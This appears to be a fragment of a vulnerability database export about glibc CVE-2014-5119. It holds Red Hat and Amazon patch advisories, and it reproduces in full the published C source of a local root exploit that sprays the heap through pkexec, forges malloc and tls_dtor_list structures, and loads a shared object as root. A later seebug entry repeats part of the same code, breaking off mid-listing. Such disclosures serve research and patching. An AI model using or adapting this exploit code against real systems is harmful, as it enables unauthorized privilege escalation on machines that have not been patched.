"https://www.exploit-db.com/download/34421/"}], "zdt": [{"lastseen": "2018-03-21T00:17:39", "bulletinFamily": "exploit", "description": "glibc __gconv_translit_find() single-fixed-byte heap metadata overflow local root exploit for Fedora 20 32-bit. This issue is not specific to Fedora, but the proof of concept is specifically for Fedora 20 32-bit.", "modified": "2014-08-27T00:00:00", "published": "2014-08-27T00:00:00", "id": "1337DAY-ID-22553", "href": "https://0day.today/exploit/description/22553", "type": "zdt", "title": "glibc Off-by-One NUL Byte gconv_translit_find Exploit", "sourceData": "// ---------------------------------------------------\r\n// CVE-2014-5119 glibc __gconv_translit_find() exploit\r\n// ------------------------ taviso & scarybeasts -----\r\n//\r\n// Tavis Ormandy <[email\u00a0protected]>\r\n// Chris Evans <[email\u00a0protected]>\r\n//\r\n// Monday 25th August, 2014\r\n//\r\n \r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <dlfcn.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <stdint.h>\r\n#include <assert.h>\r\n#include <stdarg.h>\r\n#include <stddef.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <stdbool.h>\r\n#include <sys/user.h>\r\n#include <sys/stat.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/types.h>\r\n#include <sys/ptrace.h>\r\n#include <sys/utsname.h>\r\n#include <sys/resource.h>\r\n \r\n// Minimal environment to trigger corruption in __gconv_translit_find().\r\nstatic char * const kCorruptCharsetEnviron[] = {\r\n \"CHARSET=//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\r\n NULL,\r\n};\r\n \r\nstatic const struct rlimit kRlimMax = {\r\n .rlim_cur = RLIM_INFINITY,\r\n .rlim_max = RLIM_INFINITY,\r\n};\r\n \r\nstatic const struct rlimit kRlimMin = {\r\n .rlim_cur = 1,\r\n .rlim_max = 1,\r\n};\r\n \r\n// A malloc chunk header.\r\ntypedef struct {\r\n size_t prev_size;\r\n size_t size;\r\n uintptr_t fd;\r\n uintptr_t bk;\r\n uintptr_t fd_nextsize;\r\n uintptr_t bk_nextsize;\r\n} mchunk_t;\r\n \r\n// A tls_dtor_list node.\r\ntypedef struct {\r\n uintptr_t func;\r\n uintptr_t obj;\r\n uintptr_t map;\r\n uintptr_t next;\r\n} dlist_t;\r\n \r\n// The known_trans structure glibc uses for transliteration modules.\r\ntypedef struct {\r\n uint8_t info[32];\r\n char *fname;\r\n void *handle;\r\n int open_count;\r\n} known_t;\r\n \r\nenum {\r\n LOG_DEBUG,\r\n LOG_WARN,\r\n LOG_ERROR,\r\n LOG_FATAL,\r\n};\r\n \r\n// Round up an integer to the next PAGE_SIZE boundary.\r\nstatic inline uintptr_t next_page_size(uintptr_t size)\r\n{\r\n return (size + PAGE_SIZE - 1) & PAGE_MASK;\r\n}\r\n \r\n// Allocate a buffer of specified length, starting with s, containing c, terminated with t.\r\nstatic void * alloc_repeated_string(size_t length, int s, int c, int t)\r\n{\r\n return memset(memset(memset(malloc(length), t, length), c, length - 1), s, 1);\r\n}\r\n \r\nstatic void logmessage(int level, const char * format, ...)\r\n{\r\n va_list ap;\r\n \r\n switch (level) {\r\n case LOG_DEBUG: fprintf(stderr, \"[*] \"); break;\r\n case LOG_WARN: fprintf(stderr, \"[*] \"); break;\r\n case LOG_ERROR: fprintf(stderr, \"[!] \"); break;\r\n }\r\n \r\n va_start(ap, format);\r\n vfprintf(stderr, format, ap);\r\n va_end(ap);\r\n \r\n fputc('\\n', stderr);\r\n \r\n if (level == LOG_ERROR) {\r\n _exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\n// Parse a libc malloc assertion message to extract useful pointers.\r\n//\r\n// Note, this isn't to defeat ASLR, it just makes it more portable across\r\n// different system configurations. ASLR is already nullified using rlimits,\r\n// although technically even that isn't necessary.\r\nstatic int parse_fatal_error(uintptr_t *chunkptr, uintptr_t *baseaddr, uintptr_t *bssaddr, uintptr_t *libcaddr)\r\n{\r\n FILE *pty;\r\n char *mallocerror;\r\n char *memorymap;\r\n char *line;\r\n char *prev;\r\n char message[1 << 14];\r\n char *anon = NULL;\r\n char r, w, x, s;\r\n ssize_t count;\r\n int status;\r\n uintptr_t mapstart;\r\n uintptr_t mapend;\r\n \r\n // Unfortunately, glibc writes it's error messaged to /dev/tty. This cannot\r\n // be changed in setuid programs, so this wrapper catches tty output.\r\n while (true) {\r\n // Reset any previous output.\r\n memset(message, 0, sizeof message);\r\n \r\n logmessage(LOG_DEBUG, \"Attempting to invoke pseudo-pty helper (this will take a few seconds)...\");\r\n \r\n if ((pty = popen(\"./pty\", \"r\")) == NULL) {\r\n logmessage(LOG_ERROR, \"failed to execute pseudo-pty helper utility, cannot continue\");\r\n }\r\n \r\n if ((count = fread(message, 1, sizeof message, pty)) <= 0) {\r\n logmessage(LOG_ERROR, \"failed to read output from pseudo-pty helper, %d (%m)\", count, message);\r\n }\r\n \r\n logmessage(LOG_DEBUG, \"Read %u bytes of output from pseudo-pty helper, parsing...\", count);\r\n \r\n pclose(pty);\r\n \r\n mallocerror = strstr(message, \"corrupted double-linked list\");\r\n memorymap = strstr(message, \"======= Memory map: ========\");\r\n \r\n // Unfortunately this isn't reliable, keep trying until it works.\r\n if (mallocerror == NULL || memorymap == NULL) {\r\n logmessage(LOG_WARN, \"expected output missing (this is normal), trying again...\");\r\n continue;\r\n }\r\n \r\n logmessage(LOG_DEBUG, \"pseudo-pty helper succeeded\");\r\n break;\r\n }\r\n \r\n *baseaddr = 0;\r\n *chunkptr = 0;\r\n *bssaddr = 0;\r\n *libcaddr = 0;\r\n \r\n logmessage(LOG_DEBUG, \"attempting to parse libc fatal error message...\");\r\n \r\n // Verify this is a message we understand.\r\n if (!mallocerror || !memorymap) {\r\n logmessage(LOG_ERROR, \"unable to locate required error messages in crash dump\");\r\n }\r\n \r\n // First, find the chunk pointer that malloc doesn't like\r\n if (sscanf(mallocerror, \"corrupted double-linked list: %p ***\", chunkptr) != 1) {\r\n logmessage(LOG_ERROR, \"having trouble parsing this error message: %.20s\", mallocerror);\r\n };\r\n \r\n logmessage(LOG_DEBUG, \"discovered chunk pointer from `%.20s...`, => %p\", mallocerror, *chunkptr);\r\n logmessage(LOG_DEBUG, \"attempting to parse the libc maps dump...\");\r\n \r\n // Second, parse maps.\r\n for (prev = line = memorymap; line = strtok(line, \"\\n\"); prev = line, line = NULL) {\r\n char filename[32];\r\n \r\n // Reset filename.\r\n memset(filename, 0, sizeof filename);\r\n \r\n // Just ignore the banner printed by glibc.\r\n if (strcmp(line, \"======= Memory map: ========\") == 0) {\r\n continue;\r\n }\r\n \r\n if (sscanf(line, \"%08x-%08x %c%c%c%c %*8x %*s %*u %31s\", &mapstart, &mapend, &r, &w, &x, &s, filename) >= 1) {\r\n // Record the last seen anonymous map, in case the kernel didn't tag the heap.\r\n if (strlen(filename) == 0) {\r\n anon = line;\r\n }\r\n \r\n // If the kernel did tag the heap, then everything is easy.\r\n if (strcmp(filename, \"[heap]\") == 0) {\r\n logmessage(LOG_DEBUG, \"successfully located first morecore chunk w/tag @%p\", mapstart);\r\n *baseaddr = mapstart;\r\n }\r\n \r\n // If it didn't tag the heap, then we need the anonymous chunk before the stack.\r\n if (strcmp(filename, \"[stack]\") == 0 && !*baseaddr) {\r\n logmessage(LOG_WARN, \"no [heap] tag was found, using heuristic...\");\r\n if (sscanf(anon, \"%08x-%*08x %*c%*c%*c%*c %*8x %*s %*u %31s\", baseaddr, filename) < 1) {\r\n logmessage(LOG_ERROR, \"expected to find heap location in line `%s`, but failed\", anon);\r\n }\r\n logmessage(LOG_DEBUG, \"located first morecore chunk w/o [email\u00a0protected]%p\", *baseaddr);\r\n }\r\n \r\n if (strcmp(filename, \"/usr/lib/libc-2.18.so\") == 0 && x == 'x') {\r\n logmessage(LOG_DEBUG, \"found libc.so mapped @%p\", mapstart);\r\n *libcaddr = mapstart;\r\n }\r\n \r\n // Try to find libc bss.\r\n if (strlen(filename) == 0 && mapend - mapstart == 0x102000) {\r\n logmessage(LOG_DEBUG, \"expecting libc.so bss to begin at %p\", mapstart);\r\n *bssaddr = mapstart;\r\n }\r\n continue;\r\n }\r\n \r\n logmessage(LOG_ERROR, \"unable to parse maps line `%s`, quiting\", line);\r\n break;\r\n }\r\n \r\n return (*chunkptr == 0 || *baseaddr == 0 || *bssaddr == 0 || *libcaddr == 0) ? 1 : 0;\r\n}\r\n \r\nstatic const size_t heap_chunk_start = 0x506c8008;\r\nstatic const size_t heap_chunk_end = 0x506c8008 + (2 * 1024 * 1024);\r\n \r\nstatic const size_t nstrings = 15840000;\r\n \r\n// The offset into libc-2.18.so BSS of tls_dtor_list.\r\nstatic const uintptr_t kTlsDtorListOffset = 0x12d4;\r\n \r\n// The DSO we want to load as euid 0.\r\nstatic const char kExploitDso[] = \"./exploit.so\";\r\n \r\nint main(int argc, const char* argv[])\r\n{\r\n uintptr_t baseaddr;\r\n uintptr_t chunkptr;\r\n uintptr_t bssaddr;\r\n uintptr_t libcaddr;\r\n uint8_t *param;\r\n char **args;\r\n dlist_t *chain;\r\n struct utsname ubuf;\r\n \r\n // Look up host type.\r\n if (uname(&ubuf) != 0) {\r\n logmessage(LOG_ERROR, \"failed to query kernel information\");\r\n }\r\n \r\n logmessage(LOG_DEBUG, \"---------------------------------------------------\");\r\n logmessage(LOG_DEBUG, \"CVE-2014-5119 glibc __gconv_translit_find() exploit\");\r\n logmessage(LOG_DEBUG, \"------------------------ taviso & scarybeasts -----\");\r\n \r\n // Print some warning that this isn't going to work on Ubuntu.\r\n if (access(\"/etc/fedora-release\", F_OK) != 0 || strcmp(ubuf.machine, \"i686\") != 0)\r\n logmessage(LOG_WARN, \"This proof of concept is designed for 32 bit Fedora 20\");\r\n \r\n // Extract some useful pointers from glibc error output.\r\n if (parse_fatal_error(&chunkptr, &baseaddr, &bssaddr, &libcaddr) != 0) {\r\n logmessage(LOG_ERROR, \"unable to parse libc fatal error message, please try again.\");\r\n }\r\n \r\n logmessage(LOG_DEBUG, \"allocating space for argument structure...\");\r\n \r\n // This number of \"-u\" arguments is used to spray the heap.\r\n // Each value is a 59-byte string, leading to a 64-byte heap chunk, leading to a stable heap pattern.\r\n // The value is just large enough to usuaully crash the heap into the stack without going OOM.\r\n if ((args = malloc(((nstrings * 2 + 3) * sizeof(char *)))) == NULL) {\r\n logmessage(LOG_ERROR, \"allocating argument structure failed\");\r\n }\r\n \r\n logmessage(LOG_DEBUG, \"creating command string...\");\r\n \r\n args[nstrings * 2 + 1] = alloc_repeated_string(471, '/', 1, 0);\r\n args[nstrings * 2 + 2] = NULL;\r\n \r\n logmessage(LOG_DEBUG, \"creating a tls_dtor_list node...\");\r\n \r\n // The length 59 is chosen to cause a 64byte allocation by stdrup. That is\r\n // a 60 byte nul-terminated string, followed by 4 bytes of metadata.\r\n param = alloc_repeated_string(59, 'A', 'A', 0);\r\n chain = (void *) param;\r\n \r\n logmessage(LOG_DEBUG, \"open_translit() symbol will be at %p\", libcaddr + _OPEN_TRANSLIT_OFF);\r\n logmessage(LOG_DEBUG, \"offsetof(struct known_trans, fname) => %u\", offsetof(known_t, fname));\r\n \r\n chain->func = libcaddr + _OPEN_TRANSLIT_OFF;\r\n chain->obj = baseaddr + 8 + sizeof(*chain) - 4 - offsetof(known_t, fname);\r\n chain->map = baseaddr + 8 + sizeof(*chain);\r\n chain->next = baseaddr + 8 + 59 - strlen(kExploitDso);\r\n \r\n logmessage(LOG_DEBUG, \"appending `%s` to list node\", kExploitDso);\r\n \r\n memcpy(param + 59 - strlen(kExploitDso), kExploitDso, 12);\r\n \r\n logmessage(LOG_DEBUG, \"building parameter list...\");\r\n for (int i = 0; i < nstrings; ++i) {\r\n args[i*2 + 1] = \"-u\";\r\n args[i*2 + 2] = (void *) chain;\r\n }\r\n \r\n // Verify we didn't sneak in a NUL.\r\n assert(memchr(chain, 0, sizeof(chain)) == NULL);\r\n \r\n logmessage(LOG_DEBUG, \"anticipating tls_dtor_list to be at %p\", bssaddr + kTlsDtorListOffset);\r\n \r\n // Spam all of possible chunks (some are unfortunately missed).\r\n for (int i = 0; true; i++) {\r\n uintptr_t chunksize = 64;\r\n uintptr_t chunkaddr = baseaddr + i * chunksize;\r\n uintptr_t targetpageoffset = chunkptr & ~PAGE_MASK;\r\n uintptr_t chunkpageoffset = PAGE_MASK;\r\n uintptr_t mmapbase = 31804 + ((0xFD8 - targetpageoffset) / 32);\r\n uint8_t *param = NULL;\r\n mchunk_t chunk = {\r\n .prev_size = 0xCCCCCCCC,\r\n .size = 0xDDDDDDDD,\r\n .fd_nextsize = bssaddr + kTlsDtorListOffset - 0x14,\r\n .bk_nextsize = baseaddr + 8,\r\n };\r\n \r\n // Compensate for heap metadata every 1MB of allocations.\r\n chunkaddr += 8 + (i / (1024 * 1024 / chunksize - 1) * chunksize);\r\n \r\n if (chunkaddr < heap_chunk_start)\r\n continue;\r\n \r\n if (chunkaddr > heap_chunk_end)\r\n break;\r\n \r\n chunkpageoffset = chunkaddr & ~PAGE_MASK;\r\n \r\n if (chunkpageoffset > targetpageoffset) {\r\n continue;\r\n }\r\n \r\n if (targetpageoffset - chunkpageoffset > chunksize) {\r\n continue;\r\n }\r\n \r\n // Looks like this will fit, compensate the pointers for alignment.\r\n chunk.fd = chunk.bk = chunkaddr + (targetpageoffset - chunkpageoffset);\r\n \r\n if (memchr(&chunk, 0, sizeof chunk)) {\r\n logmessage(LOG_WARN, \"parameter %u would contain a nul, skipping\", i);\r\n continue;\r\n }\r\n args[mmapbase + i * 2] = param = alloc_repeated_string(60, 'A', 'A', 0);\r\n \r\n memcpy(param + (targetpageoffset - chunkpageoffset),\r\n &chunk,\r\n sizeof chunk);\r\n }\r\n \r\n setrlimit(RLIMIT_STACK, &kRlimMax);\r\n setrlimit(RLIMIT_DATA, &kRlimMin);\r\n \r\n args[0] = \"pkexec\";\r\n \r\n logmessage(LOG_DEBUG, \"execvpe(%s...)...\", args[0]);\r\n execvpe(\"pkexec\", args, kCorruptCharsetEnviron);\r\n}\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22553"}], "redhat": [{"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn off-by-one heap-based buffer overflow flaw was found in glibc's internal\n__gconv_translit_find() function. An attacker able to make an application\ncall the iconv_open() function with a specially crafted argument could\npossibly use this flaw to execute arbitrary code with the privileges of\nthat application. (CVE-2014-5119)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T11:55:25", "published": "2014-09-02T04:00:00", "id": "RHSA-2014:1118", "href": "https://access.redhat.com/errata/RHSA-2014:1118", "type": "redhat", "title": "(RHSA-2014:1118) Important: glibc security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:47:05", "bulletinFamily": "unix", "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name Server\nCaching Daemon (nscd) used by multiple programs on the system. Without\nthese libraries, the Linux system cannot function correctly.\n\nAn out-of-bounds read flaw was found in the way glibc's iconv() function\nconverted certain encoded data to UTF-8. An attacker able to make an\napplication call the iconv() function with a specially crafted argument\ncould use this flaw to crash that application. (CVE-2014-6040)\n\nIt was found that the files back end of Name Service Switch (NSS) did not\nisolate iteration over an entire database from key-based look-up API calls.\nAn application performing look-ups on a database while iterating over it\ncould enter an infinite loop, leading to a denial of service.\n(CVE-2014-8121)\n\nThis update also fixes the following bugs:\n\n* Due to problems with buffer extension and reallocation, the nscd daemon\nterminated unexpectedly with a segmentation fault when processing long\nnetgroup entries. With this update, the handling of long netgroup entries\nhas been corrected and nscd no longer crashes in the described scenario.\n(BZ#1138520)\n\n* If a file opened in append mode was truncated with the ftruncate()\nfunction, a subsequent ftell() call could incorrectly modify the file\noffset. This update ensures that ftell() modifies the stream state only\nwhen it is in append mode and the buffer for the stream is not empty.\n(BZ#1156331)\n\n* A defect in the C library headers caused builds with older compilers to\ngenerate incorrect code for the btowc() function in the older compatibility C++\nstandard library. Applications calling btowc() in the compatibility C++ standard\nlibrary became unresponsive. With this update, the C library headers have been\ncorrected, and the compatibility C++ standard library shipped with Red Hat\nEnterprise Linux has been rebuilt. Applications that rely on the compatibility\nC++ standard library no longer hang when calling btowc(). (BZ#1120490)\n\n* Previously, when using netgroups and the nscd daemon was set up to cache\nnetgroup information, the sudo utility denied access to valid users. The bug in\nnscd has been fixed, and sudo now works in netgroups as\nexpected. (BZ#1080766)\n\nUsers of glibc are advised to upgrade to these updated packages, which fix these\nissues.\n", "modified": "2018-04-12T03:33:28", "published": "2015-03-05T05:00:00", "id": "RHSA-2015:0327", "href": "https://access.redhat.com/errata/RHSA-2015:0327", "type": "redhat", "title": "(RHSA-2015:0327) Moderate: glibc security and bug fix update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-13T18:45:24", "bulletinFamily": "unix", "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name Server\nCaching Daemon (nscd) used by multiple programs on the system. Without\nthese libraries, the Linux system cannot function correctly.\n\nAn out-of-bounds read flaw was found in the way glibc's iconv() function\nconverted certain encoded data to UTF-8. An attacker able to make an\napplication call the iconv() function with a specially crafted argument\ncould use this flaw to crash that application. (CVE-2014-6040)\n\nIt was found that the wordexp() function would perform command substitution\neven when the WRDE_NOCMD flag was specified. An attacker able to provide\nspecially crafted input to an application using the wordexp() function, and\nnot sanitizing the input correctly, could potentially use this flaw to\nexecute arbitrary commands with the credentials of the user running that\napplication. (CVE-2014-7817)\n\nThe CVE-2014-7817 issue was discovered by Tim Waugh of the Red Hat\nDeveloper Experience Team.\n\nThis update also fixes the following bugs:\n\n* Previously, when an address lookup using the getaddrinfo() function for\nthe AF_UNSPEC value was performed on a defective DNS server, the server in\nsome cases responded with a valid response for the A record, but a referral\nresponse for the AAAA record, which resulted in a lookup failure. A prior\nupdate was implemented for getaddrinfo() to return the valid response, but\nit contained a typographical error, due to which the lookup could under\nsome circumstances still fail. This error has been corrected and\ngetaddrinfo() now returns a valid response in the described circumstances.\n(BZ#1172023)\n\n* An error in the dlopen() library function previously caused recursive\ncalls to dlopen() to terminate unexpectedly or to abort with a library\nassertion. This error has been fixed and recursive calls to dlopen() no\nlonger crash or abort. (BZ#1173469)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n", "modified": "2018-06-06T20:24:20", "published": "2015-01-07T05:00:00", "id": "RHSA-2015:0016", "href": "https://access.redhat.com/errata/RHSA-2015:0016", "type": "redhat", "title": "(RHSA-2015:0016) Moderate: glibc security and bug fix update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-13T18:45:19", "bulletinFamily": "unix", "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn off-by-one heap-based buffer overflow flaw was found in glibc's internal\n__gconv_translit_find() function. An attacker able to make an application\ncall the iconv_open() function with a specially crafted argument could\npossibly use this flaw to execute arbitrary code with the privileges of\nthat application. (CVE-2014-5119)\n\nA directory traveral flaw was found in the way glibc loaded locale files.\nAn attacker able to make an application use a specially crafted locale name\nvalue (for example, specified in an LC_* environment variable) could\npossibly use this flaw to execute arbitrary code with the privileges of\nthat application. (CVE-2014-0475)\n\nRed Hat would like to thank Stephane Chazelas for reporting CVE-2014-0475.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n", "modified": "2018-06-06T20:24:08", "published": "2014-08-29T04:00:00", "id": "RHSA-2014:1110", "href": "https://access.redhat.com/errata/RHSA-2014:1110", "type": "redhat", "title": "(RHSA-2014:1110) Important: glibc security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2019-05-29T17:22:50", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nAn off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-devel-2.17-55.85.amzn1.i686 \n glibc-2.17-55.85.amzn1.i686 \n glibc-utils-2.17-55.85.amzn1.i686 \n nscd-2.17-55.85.amzn1.i686 \n glibc-headers-2.17-55.85.amzn1.i686 \n glibc-debuginfo-common-2.17-55.85.amzn1.i686 \n glibc-static-2.17-55.85.amzn1.i686 \n glibc-common-2.17-55.85.amzn1.i686 \n glibc-debuginfo-2.17-55.85.amzn1.i686 \n \n src: \n glibc-2.17-55.85.amzn1.src \n \n x86_64: \n glibc-debuginfo-2.17-55.85.amzn1.x86_64 \n glibc-common-2.17-55.85.amzn1.x86_64 \n glibc-utils-2.17-55.85.amzn1.x86_64 \n glibc-2.17-55.85.amzn1.x86_64 \n glibc-static-2.17-55.85.amzn1.x86_64 \n glibc-debuginfo-common-2.17-55.85.amzn1.x86_64 \n glibc-headers-2.17-55.85.amzn1.x86_64 \n nscd-2.17-55.85.amzn1.x86_64 \n glibc-devel-2.17-55.85.amzn1.x86_64 \n \n \n", "modified": "2014-09-19T11:57:00", "published": "2014-09-19T11:57:00", "id": "ALAS-2014-399", "href": "https://alas.aws.amazon.com/ALAS-2014-399.html", "title": "Important: glibc", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:22:33", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nAn out-of-bounds read flaw was found in the way glibc's iconv() function converted certain encoded data to UTF-8. An attacker able to make an application call the iconv() function with a specially crafted argument could use this flaw to crash that application. ([CVE-2014-6040 __](<https://access.redhat.com/security/cve/CVE-2014-6040>))\n\nIt was found that the wordexp() function would perform command substitution even when the WRDE_NOCMD flag was specified. An attacker able to provide specially crafted input to an application using the wordexp() function, and not sanitizing the input correctly, could potentially use this flaw to execute arbitrary commands with the credentials of the user running that application. ([CVE-2014-7817 __](<https://access.redhat.com/security/cve/CVE-2014-7817>))\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-common-2.17-55.92.amzn1.i686 \n glibc-devel-2.17-55.92.amzn1.i686 \n glibc-debuginfo-2.17-55.92.amzn1.i686 \n glibc-utils-2.17-55.92.amzn1.i686 \n glibc-debuginfo-common-2.17-55.92.amzn1.i686 \n nscd-2.17-55.92.amzn1.i686 \n glibc-static-2.17-55.92.amzn1.i686 \n glibc-headers-2.17-55.92.amzn1.i686 \n glibc-2.17-55.92.amzn1.i686 \n \n src: \n glibc-2.17-55.92.amzn1.src \n \n x86_64: \n glibc-2.17-55.92.amzn1.x86_64 \n glibc-utils-2.17-55.92.amzn1.x86_64 \n nscd-2.17-55.92.amzn1.x86_64 \n glibc-headers-2.17-55.92.amzn1.x86_64 \n glibc-static-2.17-55.92.amzn1.x86_64 \n glibc-debuginfo-2.17-55.92.amzn1.x86_64 \n glibc-debuginfo-common-2.17-55.92.amzn1.x86_64 \n glibc-common-2.17-55.92.amzn1.x86_64 \n glibc-devel-2.17-55.92.amzn1.x86_64 \n \n \n", "modified": "2015-01-08T12:40:00", "published": "2015-01-08T12:40:00", "id": "ALAS-2015-468", "href": "https://alas.aws.amazon.com/ALAS-2015-468.html", "title": "Medium: glibc", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T17:22:33", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nAn out-of-bounds read flaw was found in the way glibc's iconv() function converted certain encoded data to UTF-8. An attacker able to make an application call the iconv() function with a specially crafted argument could use this flaw to crash that application. ([CVE-2014-6040 __](<https://access.redhat.com/security/cve/CVE-2014-6040>))\n\nIt was found that the files back end of Name Service Switch (NSS) did not isolate iteration over an entire database from key-based look-up API calls. An application performing look-ups on a database while iterating over it could enter an infinite loop, leading to a denial of service. ([CVE-2014-8121 __](<https://access.redhat.com/security/cve/CVE-2014-8121>))\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-2.17-55.139.amzn1.i686 \n glibc-common-2.17-55.139.amzn1.i686 \n glibc-static-2.17-55.139.amzn1.i686 \n glibc-devel-2.17-55.139.amzn1.i686 \n glibc-headers-2.17-55.139.amzn1.i686 \n glibc-debuginfo-common-2.17-55.139.amzn1.i686 \n glibc-debuginfo-2.17-55.139.amzn1.i686 \n glibc-utils-2.17-55.139.amzn1.i686 \n nscd-2.17-55.139.amzn1.i686 \n \n src: \n glibc-2.17-55.139.amzn1.src \n \n x86_64: \n glibc-debuginfo-2.17-55.139.amzn1.x86_64 \n glibc-devel-2.17-55.139.amzn1.x86_64 \n glibc-headers-2.17-55.139.amzn1.x86_64 \n nscd-2.17-55.139.amzn1.x86_64 \n glibc-common-2.17-55.139.amzn1.x86_64 \n glibc-2.17-55.139.amzn1.x86_64 \n glibc-static-2.17-55.139.amzn1.x86_64 \n glibc-utils-2.17-55.139.amzn1.x86_64 \n glibc-debuginfo-common-2.17-55.139.amzn1.x86_64 \n \n \n", "modified": "2015-03-23T08:55:00", "published": "2015-03-23T08:55:00", "id": "ALAS-2015-495", "href": "https://alas.aws.amazon.com/ALAS-2015-495.html", "title": "Medium: glibc", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T13:13:33", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-09-04T00:00:00", "published": "2014-09-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87222", "id": "SSV:87222", "type": "seebug", "title": "glibc Off-by-One NUL Byte gconv_translit_find Exploit", "sourceData": "\n //\r\n// Full Exploit: http://www.exploit-db.com/sploits/CVE-2014-5119.tar.gz\r\n//\r\n//\r\n// ---------------------------------------------------\r\n// CVE-2014-5119 glibc __gconv_translit_find() exploit\r\n// ------------------------ taviso & scarybeasts -----\r\n//\r\n// Tavis Ormandy <taviso@cmpxhg8b.com>\r\n// Chris Evans <scarybeasts@gmail.com>\r\n//\r\n// Monday 25th August, 2014\r\n//\r\n \r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <dlfcn.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <stdint.h>\r\n#include <assert.h>\r\n#include <stdarg.h>\r\n#include <stddef.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <stdbool.h>\r\n#include <sys/user.h>\r\n#include <sys/stat.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/types.h>\r\n#include <sys/ptrace.h>\r\n#include <sys/utsname.h>\r\n#include <sys/resource.h>\r\n \r\n// Minimal environment to trigger corruption in __gconv_translit_find().\r\nstatic char * const kCorruptCharsetEnviron[] = {\r\n "CHARSET=//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",\r\n NULL,\r\n};\r\n \r\nstatic const struct rlimit kRlimMax = {\r\n .rlim_cur = RLIM_INFINITY,\r\n .rlim_max = RLIM_INFINITY,\r\n};\r\n \r\nstatic const struct rlimit kRlimMin = {\r\n .rlim_cur = 1,\r\n .rlim_max = 1,\r\n};\r\n \r\n// A malloc chunk header.\r\ntypedef struct {\r\n size_t prev_size;\r\n size_t size;\r\n uintptr_t fd;\r\n uintptr_t bk;\r\n uintptr_t fd_nextsize;\r\n uintptr_t bk_nextsize;\r\n} mchunk_t;\r\n \r\n// A tls_dtor_list node.\r\ntypedef struct {\r\n uintptr_t func;\r\n uintptr_t obj;\r\n uintptr_t map;\r\n uintptr_t next;\r\n} dlist_t;\r\n \r\n// The known_trans structure glibc uses for transliteration modules.\r\ntypedef struct {\r\n uint8_t info[32];\r\n char *fname;\r\n void *handle;\r\n int open_count;\r\n} known_t;\r\n \r\nenum {\r\n LOG_DEBUG,\r\n LOG_WARN,\r\n LOG_ERROR,\r\n LOG_FATAL,\r\n};\r\n \r\n// Round up an integer to the next PAGE_SIZE boundary.\r\nstatic inline uintptr_t next_page_size(uintptr_t size)\r\n{\r\n return (size + PAGE_SIZE - 1) & PAGE_MASK;\r\n}\r\n \r\n// Allocate a buffer of specified length, starting with s, containing c, terminated with t.\r\nstatic void * alloc_repeated_string(size_t length, int s, int c, int t)\r\n{\r\n return memset(memset(memset(malloc(length), t, length), c, length - 1), s, 1);\r\n}\r\n 